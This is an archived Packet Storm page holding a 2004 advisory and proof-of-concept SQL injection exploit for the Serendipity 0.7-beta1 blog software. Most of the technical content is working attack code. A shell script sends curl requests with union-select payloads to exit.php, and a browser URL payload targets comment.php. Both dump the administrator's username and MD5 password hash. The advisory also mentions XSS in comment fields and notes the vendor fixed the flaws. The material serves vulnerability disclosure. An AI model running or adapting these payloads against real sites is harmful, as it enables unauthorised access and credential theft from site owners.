what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

serendipityPoC.txt

serendipityPoC.txt
Posted Oct 1, 2004
Authored by aCiDBiTS

Serendipity 0.7-beta1 and below proof of concept SQL injection exploit that dumps the administrator's username and md5 password hash.

tags | exploit, sql injection, proof of concept
SHA-256 | 0921a8c65327c27213316b4ea2d5b801a1e0596f4384dfe6d3868e19d39cc355

serendipityPoC.txt

Change Mirror Download
Serendipity 0.7-beta1   SQL Injection   Proof of Concept
By aCiDBiTS acidbits@gmail.com 13-September-2004


"Serendipity (http://www.s9y.org/) is a weblog/blog system,
implemented with PHP. It is standards compliant, feature rich and open
source (BSD License)."

There is no user input sanitation for parameters entry_id in exit.php
and comment.php prior being used in a SQL query. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code. Comment.php
is also prone to XSS through email and username post's fields.
Serendipity 0.7-beta1 and older versions are vulnerable.

Developer team had been notified 13-September-2004 and this
vulnerabilities are fixed from Serendipity 0.7-beta3.

These PoCs dumps admin's username and md5(password).



Proof of Concept 1
------------------

Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog

ser_sqli_poc.sh
---------8<-----------8<-------------
#!/bin/sh

echo -n "Username: "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
echo -n "MD5(password): "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
---------8<-----------8<-------------



Proof of Concept 2
------------------

Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.

http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*




\ /
(Oo)
//||\\

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close